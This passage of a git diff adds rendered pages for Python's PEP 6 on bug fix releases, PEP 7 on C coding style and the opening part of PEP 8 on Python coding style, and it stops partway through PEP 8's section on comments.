+ + + + + \ No newline at end of file diff --git a/pep-0006/index.html b/pep-0006/index.html new file mode 100644 index 00000000000..8503c92fd55 --- /dev/null +++ b/pep-0006/index.html @@ -0,0 +1,317 @@ + + + + + + + + PEP 6 – Bug Fix Releases | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 6 – Bug Fix Releases

+
+
Author:
+
Aahz <aahz at pythoncraft.com>, Anthony Baxter <anthony at interlink.com.au>
+
Status:
+
Superseded
+
Type:
+
Process
+
Created:
+
15-Mar-2001
+
Post-History:
+
15-Mar-2001, 18-Apr-2001, 19-Aug-2004
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP is obsolete. +The current release policy is documented in the devguide. +See also PEP 101 for mechanics of the release process.

+
+
+

Abstract

+

Python has historically had only a single fork of development, with +releases having the combined purpose of adding new features and +delivering bug fixes (these kinds of releases will be referred to as +“major releases”). This PEP describes how to fork off maintenance, or +bug fix, releases of old versions for the primary purpose of fixing +bugs.

+

This PEP is not, repeat NOT, a guarantee of the existence of bug fix +releases; it only specifies a procedure to be followed if bug fix +releases are desired by enough of the Python community willing to do +the work.

+
+
+

Motivation

+

With the move to SourceForge, Python development has accelerated. +There is a sentiment among part of the community that there was too +much acceleration, and many people are uncomfortable with upgrading to +new versions to get bug fixes when so many features have been added, +sometimes late in the development cycle.

+

One solution for this issue is to maintain the previous major release, +providing bug fixes until the next major release. This should make +Python more attractive for enterprise development, where Python may +need to be installed on hundreds or thousands of machines.

+
+
+

Prohibitions

+

Bug fix releases are required to adhere to the following restrictions:

+
    +
  1. There must be zero syntax changes. All .pyc and .pyo files must +work (no regeneration needed) with all bugfix releases forked off +from a major release.
  2. +
  3. There must be zero pickle changes.
  4. +
  5. There must be no incompatible C API changes. All extensions must +continue to work without recompiling in all bugfix releases in the +same fork as a major release.
  6. +
+

Breaking any of these prohibitions requires a BDFL proclamation (and a +prominent warning in the release notes).

+
+
+

Not-Quite-Prohibitions

+

Where possible, bug fix releases should also:

+
    +
  1. Have no new features. The purpose of a bug fix release is to fix +bugs, not add the latest and greatest whizzo feature from the HEAD +of the CVS root.
  2. +
  3. Be a painless upgrade. Users should feel confident that an upgrade +from 2.x.y to 2.x.(y+1) will not break their running systems. This +means that, unless it is necessary to fix a bug, the standard +library should not change behavior, or worse yet, APIs.
  4. +
+
+
+

Applicability of Prohibitions

+

The above prohibitions and not-quite-prohibitions apply both for a +final release to a bugfix release (for instance, 2.4 to 2.4.1) and for +one bugfix release to the next in a series (for instance 2.4.1 to +2.4.2).

+

Following the prohibitions listed in this PEP should help keep the +community happy that a bug fix release is a painless and safe upgrade.

+
+
+

Helping the Bug Fix Releases Happen

+

Here’s a few pointers on helping the bug fix release process along.

+
    +
  1. Backport bug fixes. If you fix a bug, and it seems appropriate, +port it to the CVS branch for the current bug fix release. If +you’re unwilling or unable to backport it yourself, make a note in +the commit message, with words like ‘Bugfix candidate’ or +‘Backport candidate’.
  2. +
  3. If you’re not sure, ask. Ask the person managing the current bug +fix releases if they think a particular fix is appropriate.
  4. +
  5. If there’s a particular bug you’d particularly like fixed in a bug +fix release, jump up and down and try to get it done. Do not wait +until 48 hours before a bug fix release is due, and then start +asking for bug fixes to be included.
  6. +
+
+
+

Version Numbers

+

Starting with Python 2.0, all major releases are required to have a +version number of the form X.Y; bugfix releases will always be of the +form X.Y.Z.

+

The current major release under development is referred to as release +N; the just-released major version is referred to as N-1.

+

In CVS, the bug fix releases happen on a branch. For release 2.x, the +branch is named ‘release2x-maint’. For example, the branch for the 2.3 +maintenance releases is release23-maint

+
+
+

Procedure

+

The process for managing bugfix releases is modeled in part on the Tcl +system [1].

+

The Patch Czar is the counterpart to the BDFL for bugfix releases. +However, the BDFL and designated appointees retain veto power over +individual patches. A Patch Czar might only be looking after a single +branch of development - it’s quite possible that a different person +might be maintaining the 2.3.x and the 2.4.x releases.

+

As individual patches get contributed to the current trunk of CVS, +each patch committer is requested to consider whether the patch is a +bug fix suitable for inclusion in a bugfix release. If the patch is +considered suitable, the committer can either commit the release to +the maintenance branch, or else mark the patch in the commit message.

+

In addition, anyone from the Python community is free to suggest +patches for inclusion. Patches may be submitted specifically for +bugfix releases; they should follow the guidelines in PEP 3. In +general, though, it’s probably better that a bug in a specific release +also be fixed on the HEAD as well as the branch.

+

The Patch Czar decides when there are a sufficient number of patches +to warrant a release. The release gets packaged up, including a +Windows installer, and made public. If any new bugs are found, they +must be fixed immediately and a new bugfix release publicized (with an +incremented version number). For the 2.3.x cycle, the Patch Czar +(Anthony) has been trying for a release approximately every six +months, but this should not be considered binding in any way on any +future releases.

+

Bug fix releases are expected to occur at an interval of roughly six +months. This is only a guideline, however - obviously, if a major bug +is found, a bugfix release may be appropriate sooner. In general, only +the N-1 release will be under active maintenance at any time. That is, +during Python 2.4’s development, Python 2.3 gets bugfix releases. If, +however, someone qualified wishes to continue the work to maintain an +older release, they should be encouraged.

+
+
+

Patch Czar History

+

Anthony Baxter is the Patch Czar for 2.3.1 through 2.3.4.

+

Barry Warsaw is the Patch Czar for 2.2.3.

+

Guido van Rossum is the Patch Czar for 2.2.2.

+

Michael Hudson is the Patch Czar for 2.2.1.

+

Anthony Baxter is the Patch Czar for 2.1.2 and 2.1.3.

+

Thomas Wouters is the Patch Czar for 2.1.1.

+

Moshe Zadka is the Patch Czar for 2.0.1.

+
+
+

History

+

This PEP started life as a proposal on comp.lang.python. The original +version suggested a single patch for the N-1 release to be released +concurrently with the N release. The original version also argued for +sticking with a strict bug fix policy.

+

Following feedback from the BDFL and others, the draft PEP was written +containing an expanded bugfix release cycle that permitted any +previous major release to obtain patches and also relaxed the strict +bug fix requirement (mainly due to the example of PEP 235, which +could be argued as either a bug fix or a feature).

+

Discussion then mostly moved to python-dev, where BDFL finally issued +a proclamation basing the Python bugfix release process on Tcl’s, +which essentially returned to the original proposal in terms of being +only the N-1 release and only bug fixes, but allowing multiple bugfix +releases until release N is published.

+

Anthony Baxter then took this PEP and revised it, based on lessons +from the 2.3 release cycle.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0006.rst

+

Last modified: 2023-11-28 14:46:07 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0007/index.html b/pep-0007/index.html new file mode 100644 index 00000000000..c025c78a102 --- /dev/null +++ b/pep-0007/index.html @@ -0,0 +1,341 @@ + + + + + + + + PEP 7 – Style Guide for C Code | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 7 – Style Guide for C Code

+
+
Author:
+
Guido van Rossum <guido at python.org>, Barry Warsaw <barry at python.org>
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
05-Jul-2001
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This document gives coding conventions for the C code comprising the C +implementation of Python. Please see the companion informational PEP +describing style guidelines for Python code.

+

Note, rules are there to be broken. Two good reasons to break a +particular rule:

+
    +
  1. When applying the rule would make the code less readable, even for +someone who is used to reading code that follows the rules.
  2. +
  3. To be consistent with surrounding code that also breaks it (maybe +for historic reasons) – although this is also an opportunity to +clean up someone else’s mess (in true XP style).
  4. +
+
+
+

C dialect

+
    +
  • Python 3.11 and newer versions use C11 without optional features. +The public C API should be compatible with C++.
  • +
  • Python 3.6 to 3.10 use C89 with several select C99 features:
      +
    • Standard integer types in <stdint.h> and <inttypes.h>. We +require the fixed width integer types.
    • +
    • static inline functions
    • +
    • designated initializers (especially nice for type declarations)
    • +
    • intermingled declarations
    • +
    • booleans
    • +
    • C++-style line comments
    • +
    +
  • +
  • Python versions before 3.6 used ANSI/ISO standard C (the 1989 version +of the standard). This meant (amongst many other things) that all +declarations must be at the top of a block (not necessarily at the +top of function).
  • +
  • Don’t use compiler-specific extensions, such as those of GCC or MSVC +(e.g. don’t write multi-line strings without trailing backslashes).
  • +
  • All function declarations and definitions must use full prototypes +(i.e. specify the types of all arguments).
  • +
  • No compiler warnings with major compilers (gcc, VC++, a few others).
  • +
  • static inline functions should be preferred over macros in new +code.
  • +
+
+
+

Code lay-out

+
    +
  • Use 4-space indents and no tabs at all.
  • +
  • No line should be longer than 79 characters. If this and the +previous rule together don’t give you enough room to code, your code +is too complicated – consider using subroutines.
  • +
  • No line should end in whitespace. If you think you need significant +trailing whitespace, think again – somebody’s editor might delete +it as a matter of routine.
  • +
  • Function definition style: function name in column 1, outermost +curly braces in column 1, blank line after local variable +declarations.
    static int
    +extra_ivars(PyTypeObject *type, PyTypeObject *base)
    +{
    +    int t_size = PyType_BASICSIZE(type);
    +    int b_size = PyType_BASICSIZE(base);
    +
    +    assert(t_size >= b_size); /* type smaller than base! */
    +    ...
    +    return 1;
    +}
    +
    +
    +
  • +
  • Code structure: one space between keywords like if, for and +the following left paren; no spaces inside the paren; braces are +required everywhere, even where C permits them to be omitted, but do +not add them to code you are not otherwise modifying. All new C +code requires braces. Braces should be formatted as shown:
    if (mro != NULL) {
    +    ...
    +}
    +else {
    +    ...
    +}
    +
    +
    +
  • +
  • The return statement should not get redundant parentheses:
    return(albatross); /* incorrect */
    +
    +
    +

    Instead:

    +
    return albatross; /* correct */
    +
    +
    +
  • +
  • Function and macro call style: foo(a, b, c) – no space before +the open paren, no spaces inside the parens, no spaces before +commas, one space after each comma.
  • +
  • Always put spaces around assignment, Boolean and comparison +operators. In expressions using a lot of operators, add spaces +around the outermost (lowest-priority) operators.
  • +
  • Breaking long lines: if you can, break after commas in the outermost +argument list. Always indent continuation lines appropriately, +e.g.:
    PyErr_Format(PyExc_TypeError,
    +             "cannot create '%.100s' instances",
    +             type->tp_name);
    +
    +
    +
  • +
  • When you break a long expression at a binary operator, braces +should be formatted as shown:
    if (type->tp_dictoffset != 0
    +    && base->tp_dictoffset == 0
    +    && type->tp_dictoffset == b_size
    +    && (size_t)t_size == b_size + sizeof(PyObject *))
    +{
    +    return 0; /* "Forgive" adding a __dict__ only */
    +}
    +
    +
    +

    It’s OK to put operators at ends of lines, especially to be +consistent with surrounding code. +(See PEP 8 for a longer discussion.)

    +
  • +
  • Vertically align line continuation characters in multi-line macros.
  • +
  • Macros intended to be used as a statement should use the +do { ... } while (0) macro idiom, +without a final semicolon. +Example:
    #define ADD_INT_MACRO(MOD, INT)                                   \
    +    do {                                                          \
    +        if (PyModule_AddIntConstant((MOD), (#INT), (INT)) < 0) {  \
    +            goto error;                                           \
    +        }                                                         \
    +    } while (0)
    +
    +// To be used like a statement with a semicolon:
    +ADD_INT_MACRO(m, SOME_CONSTANT);
    +
    +
    +
  • +
  • #undef file local macros after use.
  • +
  • Put blank lines around functions, structure definitions, and major +sections inside functions.
  • +
  • Comments go before the code they describe.
  • +
  • All functions and global variables should be declared static unless +they are to be part of a published interface.
  • +
  • For external functions and variables, we always have a declaration +in an appropriate header file in the “Include” directory, which uses +the PyAPI_FUNC() macro and PyAPI_DATA() macro, like this:
    PyAPI_FUNC(PyObject *) PyObject_Repr(PyObject *);
    +
    +PyAPI_DATA(PyTypeObject) PySuper_Type;
    +
    +
    +
  • +
+
+
+

Naming conventions

+
    +
  • Use a Py prefix for public functions; never for static +functions. The Py_ prefix is reserved for global service +routines like Py_FatalError; specific groups of routines +(e.g. specific object type APIs) use a longer prefix, +e.g. PyString_ for string functions.
  • +
  • Public functions and variables use MixedCase with underscores, like +this: PyObject_GetAttr, Py_BuildValue, PyExc_TypeError.
  • +
  • Occasionally an “internal” function has to be visible to the loader; +we use the _Py prefix for this, e.g.: _PyObject_Dump.
  • +
  • Macros should have a MixedCase prefix and then use upper case, for +example: PyString_AS_STRING, Py_PRINT_RAW.
  • +
  • Macro parameters should use ALL_CAPS style, +so they are easily distinguishable from C variables and struct members.
  • +
+
+
+

Documentation Strings

+
    +
  • Use the PyDoc_STR() or PyDoc_STRVAR() macro for docstrings +to support building Python without docstrings (./configure +--without-doc-strings).
  • +
  • The first line of each function docstring should be a “signature +line” that gives a brief synopsis of the arguments and return value. +For example:
    PyDoc_STRVAR(myfunction__doc__,
    +"myfunction(name, value) -> bool\n\n\
    +Determine whether name and value make a valid pair.");
    +
    +
    +

    Always include a blank line between the signature line and the text +of the description.

    +

    If the return value for the function is always None (because there +is no meaningful return value), do not include the indication of the +return type.

    +
  • +
  • When writing multi-line docstrings, be sure to always use backslash +continuations, as in the example above, or string literal +concatenation:
    PyDoc_STRVAR(myfunction__doc__,
    +"myfunction(name, value) -> bool\n\n"
    +"Determine whether name and value make a valid pair.");
    +
    +
    +

    Though some C compilers accept string literals without either:

    +
    /* BAD -- don't do this! */
    +PyDoc_STRVAR(myfunction__doc__,
    +"myfunction(name, value) -> bool\n\n
    +Determine whether name and value make a valid pair.");
    +
    +
    +

    not all do; the MSVC compiler is known to complain about this.

    +
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0007.rst

+

Last modified: 2024-09-09 14:02:27 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0008/index.html b/pep-0008/index.html new file mode 100644 index 00000000000..de81da4ba9e --- /dev/null +++ b/pep-0008/index.html @@ -0,0 +1,1517 @@ + + + + + + + + PEP 8 – Style Guide for Python Code | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8 – Style Guide for Python Code

+
+
Author:
+
Guido van Rossum <guido at python.org>, +Barry Warsaw <barry at python.org>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
05-Jul-2001
+
Post-History:
+
05-Jul-2001, 01-Aug-2013
+
+
+
+
Table of Contents +
+
+

Introduction

+

This document gives coding conventions for the Python code comprising +the standard library in the main Python distribution. Please see the +companion informational PEP describing style guidelines for the C code +in the C implementation of Python.

+

This document and PEP 257 (Docstring Conventions) were adapted from +Guido’s original Python Style Guide essay, with some additions from +Barry’s style guide [2].

+

This style guide evolves over time as additional conventions are +identified and past conventions are rendered obsolete by changes in +the language itself.

+

Many projects have their own coding style guidelines. In the event of any +conflicts, such project-specific guides take precedence for that project.

+
+
+

A Foolish Consistency is the Hobgoblin of Little Minds

+

One of Guido’s key insights is that code is read much more often than +it is written. The guidelines provided here are intended to improve +the readability of code and make it consistent across the wide +spectrum of Python code. As PEP 20 says, “Readability counts”.

+

A style guide is about consistency. Consistency with this style guide +is important. Consistency within a project is more important. +Consistency within one module or function is the most important.

+

However, know when to be inconsistent – sometimes style guide +recommendations just aren’t applicable. When in doubt, use your best +judgment. Look at other examples and decide what looks best. And +don’t hesitate to ask!

+

In particular: do not break backwards compatibility just to comply with +this PEP!

+

Some other good reasons to ignore a particular guideline:

+
    +
  1. When applying the guideline would make the code less readable, even +for someone who is used to reading code that follows this PEP.
  2. +
  3. To be consistent with surrounding code that also breaks it (maybe +for historic reasons) – although this is also an opportunity to +clean up someone else’s mess (in true XP style).
  4. +
  5. Because the code in question predates the introduction of the +guideline and there is no other reason to be modifying that code.
  6. +
  7. When the code needs to remain compatible with older versions of +Python that don’t support the feature recommended by the style guide.
  8. +
+
+
+

Code Lay-out

+
+

Indentation

+

Use 4 spaces per indentation level.

+

Continuation lines should align wrapped elements either vertically +using Python’s implicit line joining inside parentheses, brackets and +braces, or using a hanging indent [1]. When using a hanging +indent the following should be considered; there should be no +arguments on the first line and further indentation should be used to +clearly distinguish itself as a continuation line:

+
# Correct:
+
+# Aligned with opening delimiter.
+foo = long_function_name(var_one, var_two,
+                         var_three, var_four)
+
+# Add 4 spaces (an extra level of indentation) to distinguish arguments from the rest.
+def long_function_name(
+        var_one, var_two, var_three,
+        var_four):
+    print(var_one)
+
+# Hanging indents should add a level.
+foo = long_function_name(
+    var_one, var_two,
+    var_three, var_four)
+
+
+
# Wrong:
+
+# Arguments on first line forbidden when not using vertical alignment.
+foo = long_function_name(var_one, var_two,
+    var_three, var_four)
+
+# Further indentation required as indentation is not distinguishable.
+def long_function_name(
+    var_one, var_two, var_three,
+    var_four):
+    print(var_one)
+
+
+

The 4-space rule is optional for continuation lines.

+

Optional:

+
# Hanging indents *may* be indented to other than 4 spaces.
+foo = long_function_name(
+  var_one, var_two,
+  var_three, var_four)
+
+
+

When the conditional part of an if-statement is long enough to require +that it be written across multiple lines, it’s worth noting that the +combination of a two character keyword (i.e. if), plus a single space, +plus an opening parenthesis creates a natural 4-space indent for the +subsequent lines of the multiline conditional. This can produce a visual +conflict with the indented suite of code nested inside the if-statement, +which would also naturally be indented to 4 spaces. This PEP takes no +explicit position on how (or whether) to further visually distinguish such +conditional lines from the nested suite inside the if-statement. +Acceptable options in this situation include, but are not limited to:

+
# No extra indentation.
+if (this_is_one_thing and
+    that_is_another_thing):
+    do_something()
+
+# Add a comment, which will provide some distinction in editors
+# supporting syntax highlighting.
+if (this_is_one_thing and
+    that_is_another_thing):
+    # Since both conditions are true, we can frobnicate.
+    do_something()
+
+# Add some extra indentation on the conditional continuation line.
+if (this_is_one_thing
+        and that_is_another_thing):
+    do_something()
+
+
+

(Also see the discussion of whether to break before or after binary +operators below.)

+

The closing brace/bracket/parenthesis on multiline constructs may +either line up under the first non-whitespace character of the last +line of list, as in:

+
my_list = [
+    1, 2, 3,
+    4, 5, 6,
+    ]
+result = some_function_that_takes_arguments(
+    'a', 'b', 'c',
+    'd', 'e', 'f',
+    )
+
+
+

or it may be lined up under the first character of the line that +starts the multiline construct, as in:

+
my_list = [
+    1, 2, 3,
+    4, 5, 6,
+]
+result = some_function_that_takes_arguments(
+    'a', 'b', 'c',
+    'd', 'e', 'f',
+)
+
+
+
+
+

Tabs or Spaces?

+

Spaces are the preferred indentation method.

+

Tabs should be used solely to remain consistent with code that is +already indented with tabs.

+

Python disallows mixing tabs and spaces for indentation.

+
+
+

Maximum Line Length

+

Limit all lines to a maximum of 79 characters.

+

For flowing long blocks of text with fewer structural restrictions +(docstrings or comments), the line length should be limited to 72 +characters.

+

Limiting the required editor window width makes it possible to have +several files open side by side, and works well when using code +review tools that present the two versions in adjacent columns.

+

The default wrapping in most tools disrupts the visual structure of the +code, making it more difficult to understand. The limits are chosen to +avoid wrapping in editors with the window width set to 80, even +if the tool places a marker glyph in the final column when wrapping +lines. Some web based tools may not offer dynamic line wrapping at all.

+

Some teams strongly prefer a longer line length. For code maintained +exclusively or primarily by a team that can reach agreement on this +issue, it is okay to increase the line length limit up to 99 characters, +provided that comments and docstrings are still wrapped at 72 +characters.

+

The Python standard library is conservative and requires limiting +lines to 79 characters (and docstrings/comments to 72).

+

The preferred way of wrapping long lines is by using Python’s implied +line continuation inside parentheses, brackets and braces. Long lines +can be broken over multiple lines by wrapping expressions in +parentheses. These should be used in preference to using a backslash +for line continuation.

+

Backslashes may still be appropriate at times. For example, long, +multiple with-statements could not use implicit continuation +before Python 3.10, so backslashes were acceptable for that case:

+
with open('/path/to/some/file/you/want/to/read') as file_1, \
+     open('/path/to/some/file/being/written', 'w') as file_2:
+    file_2.write(file_1.read())
+
+
+

(See the previous discussion on multiline if-statements for further +thoughts on the indentation of such multiline with-statements.)

+

Another such case is with assert statements.

+

Make sure to indent the continued line appropriately.

+
+
+

Should a Line Break Before or After a Binary Operator?

+

For decades the recommended style was to break after binary operators. +But this can hurt readability in two ways: the operators tend to get +scattered across different columns on the screen, and each operator is +moved away from its operand and onto the previous line. Here, the eye +has to do extra work to tell which items are added and which are +subtracted:

+
# Wrong:
+# operators sit far away from their operands
+income = (gross_wages +
+          taxable_interest +
+          (dividends - qualified_dividends) -
+          ira_deduction -
+          student_loan_interest)
+
+
+

To solve this readability problem, mathematicians and their publishers +follow the opposite convention. Donald Knuth explains the traditional +rule in his Computers and Typesetting series: “Although formulas +within a paragraph always break after binary operations and relations, +displayed formulas always break before binary operations” [3].

+

Following the tradition from mathematics usually results in more +readable code:

+
# Correct:
+# easy to match operators with operands
+income = (gross_wages
+          + taxable_interest
+          + (dividends - qualified_dividends)
+          - ira_deduction
+          - student_loan_interest)
+
+
+

In Python code, it is permissible to break before or after a binary +operator, as long as the convention is consistent locally. For new +code Knuth’s style is suggested.

+
+
+

Blank Lines

+

Surround top-level function and class definitions with two blank +lines.

+

Method definitions inside a class are surrounded by a single blank +line.

+

Extra blank lines may be used (sparingly) to separate groups of +related functions. Blank lines may be omitted between a bunch of +related one-liners (e.g. a set of dummy implementations).

+

Use blank lines in functions, sparingly, to indicate logical sections.

+

Python accepts the control-L (i.e. ^L) form feed character as +whitespace; many tools treat these characters as page separators, so +you may use them to separate pages of related sections of your file. +Note, some editors and web-based code viewers may not recognize +control-L as a form feed and will show another glyph in its place.

+
+
+

Source File Encoding

+

Code in the core Python distribution should always use UTF-8, and should not +have an encoding declaration.

+

In the standard library, non-UTF-8 encodings should be used only for +test purposes. Use non-ASCII characters sparingly, preferably only to +denote places and human names. If using non-ASCII characters as data, +avoid noisy Unicode characters like z̯̯͡a̧͎̺l̡͓̫g̹̲o̡̼̘ and byte order +marks.

+

All identifiers in the Python standard library MUST use ASCII-only +identifiers, and SHOULD use English words wherever feasible (in many +cases, abbreviations and technical terms are used which aren’t +English).

+

Open source projects with a global audience are encouraged to adopt a +similar policy.

+
+
+

Imports

+
    +
  • Imports should usually be on separate lines:
    # Correct:
    +import os
    +import sys
    +
    +
    +
    # Wrong:
    +import sys, os
    +
    +
    +

    It’s okay to say this though:

    +
    # Correct:
    +from subprocess import Popen, PIPE
    +
    +
    +
  • +
  • Imports are always put at the top of the file, just after any module +comments and docstrings, and before module globals and constants.

    Imports should be grouped in the following order:

    +
      +
    1. Standard library imports.
    2. +
    3. Related third party imports.
    4. +
    5. Local application/library specific imports.
    6. +
    +

    You should put a blank line between each group of imports.

    +
  • +
  • Absolute imports are recommended, as they are usually more readable +and tend to be better behaved (or at least give better error +messages) if the import system is incorrectly configured (such as +when a directory inside a package ends up on sys.path):
    import mypkg.sibling
    +from mypkg import sibling
    +from mypkg.sibling import example
    +
    +
    +

    However, explicit relative imports are an acceptable alternative to +absolute imports, especially when dealing with complex package layouts +where using absolute imports would be unnecessarily verbose:

    +
    from . import sibling
    +from .sibling import example
    +
    +
    +

    Standard library code should avoid complex package layouts and always +use absolute imports.

    +
  • +
  • When importing a class from a class-containing module, it’s usually +okay to spell this:
    from myclass import MyClass
    +from foo.bar.yourclass import YourClass
    +
    +
    +

    If this spelling causes local name clashes, then spell them explicitly:

    +
    import myclass
    +import foo.bar.yourclass
    +
    +
    +

    and use myclass.MyClass and foo.bar.yourclass.YourClass.

    +
  • +
  • Wildcard imports (from <module> import *) should be avoided, as +they make it unclear which names are present in the namespace, +confusing both readers and many automated tools. There is one +defensible use case for a wildcard import, which is to republish an +internal interface as part of a public API (for example, overwriting +a pure Python implementation of an interface with the definitions +from an optional accelerator module and exactly which definitions +will be overwritten isn’t known in advance).

    When republishing names this way, the guidelines below regarding +public and internal interfaces still apply.

    +
  • +
+
+
+

Module Level Dunder Names

+

Module level “dunders” (i.e. names with two leading and two trailing +underscores) such as __all__, __author__, __version__, +etc. should be placed after the module docstring but before any import +statements except from __future__ imports. Python mandates that +future-imports must appear in the module before any other code except +docstrings:

+
"""This is the example module.
+
+This module does stuff.
+"""
+
+from __future__ import barry_as_FLUFL
+
+__all__ = ['a', 'b', 'c']
+__version__ = '0.1'
+__author__ = 'Cardinal Biggles'
+
+import os
+import sys
+
+
+
+
+
+

String Quotes

+

In Python, single-quoted strings and double-quoted strings are the +same. This PEP does not make a recommendation for this. Pick a rule +and stick to it. When a string contains single or double quote +characters, however, use the other one to avoid backslashes in the +string. It improves readability.

+

For triple-quoted strings, always use double quote characters to be +consistent with the docstring convention in PEP 257.

+
+
+

Whitespace in Expressions and Statements

+
+

Pet Peeves

+

Avoid extraneous whitespace in the following situations:

+
    +
  • Immediately inside parentheses, brackets or braces:
    # Correct:
    +spam(ham[1], {eggs: 2})
    +
    +
    +
    # Wrong:
    +spam( ham[ 1 ], { eggs: 2 } )
    +
    +
    +
  • +
  • Between a trailing comma and a following close parenthesis:
    # Correct:
    +foo = (0,)
    +
    +
    +
    # Wrong:
    +bar = (0, )
    +
    +
    +
  • +
  • Immediately before a comma, semicolon, or colon:
    # Correct:
    +if x == 4: print(x, y); x, y = y, x
    +
    +
    +
    # Wrong:
    +if x == 4 : print(x , y) ; x , y = y , x
    +
    +
    +
  • +
  • However, in a slice the colon acts like a binary operator, and +should have equal amounts on either side (treating it as the +operator with the lowest priority). In an extended slice, both +colons must have the same amount of spacing applied. Exception: +when a slice parameter is omitted, the space is omitted:
    # Correct:
    +ham[1:9], ham[1:9:3], ham[:9:3], ham[1::3], ham[1:9:]
    +ham[lower:upper], ham[lower:upper:], ham[lower::step]
    +ham[lower+offset : upper+offset]
    +ham[: upper_fn(x) : step_fn(x)], ham[:: step_fn(x)]
    +ham[lower + offset : upper + offset]
    +
    +
    +
    # Wrong:
    +ham[lower + offset:upper + offset]
    +ham[1: 9], ham[1 :9], ham[1:9 :3]
    +ham[lower : : step]
    +ham[ : upper]
    +
    +
    +
  • +
  • Immediately before the open parenthesis that starts the argument +list of a function call:
    # Correct:
    +spam(1)
    +
    +
    +
    # Wrong:
    +spam (1)
    +
    +
    +
  • +
  • Immediately before the open parenthesis that starts an indexing or +slicing:
    # Correct:
    +dct['key'] = lst[index]
    +
    +
    +
    # Wrong:
    +dct ['key'] = lst [index]
    +
    +
    +
  • +
  • More than one space around an assignment (or other) operator to +align it with another:
    # Correct:
    +x = 1
    +y = 2
    +long_variable = 3
    +
    +
    +
    # Wrong:
    +x             = 1
    +y             = 2
    +long_variable = 3
    +
    +
    +
  • +
+
+
+

Other Recommendations

+
    +
  • Avoid trailing whitespace anywhere. Because it’s usually invisible, +it can be confusing: e.g. a backslash followed by a space and a +newline does not count as a line continuation marker. Some editors +don’t preserve it and many projects (like CPython itself) have +pre-commit hooks that reject it.
  • +
  • Always surround these binary operators with a single space on either +side: assignment (=), augmented assignment (+=, -= +etc.), comparisons (==, <, >, !=, <>, <=, +>=, in, not in, is, is not), Booleans (and, +or, not).
  • +
  • If operators with different priorities are used, consider adding +whitespace around the operators with the lowest priority(ies). Use +your own judgment; however, never use more than one space, and +always have the same amount of whitespace on both sides of a binary +operator:
    # Correct:
    +i = i + 1
    +submitted += 1
    +x = x*2 - 1
    +hypot2 = x*x + y*y
    +c = (a+b) * (a-b)
    +
    +
    +
    # Wrong:
    +i=i+1
    +submitted +=1
    +x = x * 2 - 1
    +hypot2 = x * x + y * y
    +c = (a + b) * (a - b)
    +
    +
    +
  • +
  • Function annotations should use the normal rules for colons and +always have spaces around the -> arrow if present. (See +Function Annotations below for more about function annotations.):
    # Correct:
    +def munge(input: AnyStr): ...
    +def munge() -> PosInt: ...
    +
    +
    +
    # Wrong:
    +def munge(input:AnyStr): ...
    +def munge()->PosInt: ...
    +
    +
    +
  • +
  • Don’t use spaces around the = sign when used to indicate a +keyword argument, or when used to indicate a default value for an +unannotated function parameter:
    # Correct:
    +def complex(real, imag=0.0):
    +    return magic(r=real, i=imag)
    +
    +
    +
    # Wrong:
    +def complex(real, imag = 0.0):
    +    return magic(r = real, i = imag)
    +
    +
    +

    When combining an argument annotation with a default value, however, do use +spaces around the = sign:

    +
    # Correct:
    +def munge(sep: AnyStr = None): ...
    +def munge(input: AnyStr, sep: AnyStr = None, limit=1000): ...
    +
    +
    +
    # Wrong:
    +def munge(input: AnyStr=None): ...
    +def munge(input: AnyStr, limit = 1000): ...
    +
    +
    +
  • +
  • Compound statements (multiple statements on the same line) are +generally discouraged:
    # Correct:
    +if foo == 'blah':
    +    do_blah_thing()
    +do_one()
    +do_two()
    +do_three()
    +
    +
    +

    Rather not:

    +
    # Wrong:
    +if foo == 'blah': do_blah_thing()
    +do_one(); do_two(); do_three()
    +
    +
    +
  • +
  • While sometimes it’s okay to put an if/for/while with a small body +on the same line, never do this for multi-clause statements. Also +avoid folding such long lines!

    Rather not:

    +
    # Wrong:
    +if foo == 'blah': do_blah_thing()
    +for x in lst: total += x
    +while t < 10: t = delay()
    +
    +
    +

    Definitely not:

    +
    # Wrong:
    +if foo == 'blah': do_blah_thing()
    +else: do_non_blah_thing()
    +
    +try: something()
    +finally: cleanup()
    +
    +do_one(); do_two(); do_three(long, argument,
    +                             list, like, this)
    +
    +if foo == 'blah': one(); two(); three()
    +
    +
    +
  • +
+
+
+
+

When to Use Trailing Commas

+

Trailing commas are usually optional, except they are mandatory when +making a tuple of one element. For clarity, it is recommended to +surround the latter in (technically redundant) parentheses:

+
# Correct:
+FILES = ('setup.cfg',)
+
+
+
# Wrong:
+FILES = 'setup.cfg',
+
+
+

When trailing commas are redundant, they are often helpful when a +version control system is used, when a list of values, arguments or +imported items is expected to be extended over time. The pattern is +to put each value (etc.) on a line by itself, always adding a trailing +comma, and add the close parenthesis/bracket/brace on the next line. +However it does not make sense to have a trailing comma on the same +line as the closing delimiter (except in the above case of singleton +tuples):

+
# Correct:
+FILES = [
+    'setup.cfg',
+    'tox.ini',
+    ]
+initialize(FILES,
+           error=True,
+           )
+
+
+
# Wrong:
+FILES = ['setup.cfg', 'tox.ini',]
+initialize(FILES, error=True,)
+
+
+
+
+

Comments

+

Comments that contradict the code are worse than no comments. Always +make a priority of keeping the comments up-to-date when the code +changes!

+

Comments should be complete sentences. The first word should be +capitalized, unless it is an identifier that begins with a lower case +letter (never alter the case of identifiers!).

+

